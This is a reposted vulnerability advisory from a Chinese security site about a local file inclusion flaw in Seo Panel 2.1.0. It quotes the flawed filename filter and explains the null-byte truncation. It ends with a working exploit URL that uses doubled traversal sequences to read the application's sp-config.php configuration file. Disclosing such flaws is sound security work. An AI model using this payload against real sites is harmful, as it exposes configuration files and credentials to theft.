热门关键字:   网站安全  系统安全  安全漏洞  黑客攻防  网络安全

Seo Panel 2.1.0 本地文件包含漏洞

发布时间:2010-11-09 15:43文章来源:网络文章作者:MaXe 点击次数:
摘要:发布日期:2010-11.09 发布作者:MaXe 影响版本:Seo Panel 2.1.0 官方地址:www.seopanel.in 漏洞类型:文件包含 漏洞描述:Seo Panel是一个搜索优化控制台,为网站提供SEO优化提供全面分析工具。 漏洞分析:Seo Panel之所以存在本地文件包含漏洞是因为down...

发布日期:2010-11.09
发布作者:MaXe

影响版本:Seo Panel 2.1.0
官方地址:www.seopanel.in


漏洞类型:文件包含
漏洞描述:Seo Panel是一个搜索优化控制台,为网站提供SEO优化提供全面分析工具。

漏洞分析:Seo Panel之所以存在本地文件包含漏洞是因为download.php GET未使用正确的参数导致%00截断可形成本地文件包含。

download.ctrl.php: (Line 55-62)

55 function isValidFile($fileName) {

56 $fileName = urldecode($fileName);

// This tries to prevent directory traversal

57 $fileName = str_replace('../', '', $fileName);

58 if (preg_match('/\.xml$|\.html$|\.txt$/i', $fileName)) {

59 return $fileName;

60 }

61 return false;

62 }


EXP:

http://site/seopanel/download.php?filesec=sitemap&filetype=text&file=....//config/sp-config.php%00.txt

 

标签分类:

上一篇:JAF CMS 4.0 RC2 可执行代码漏洞
下一篇:FCKeditor 2.0-2.4.3漏洞分析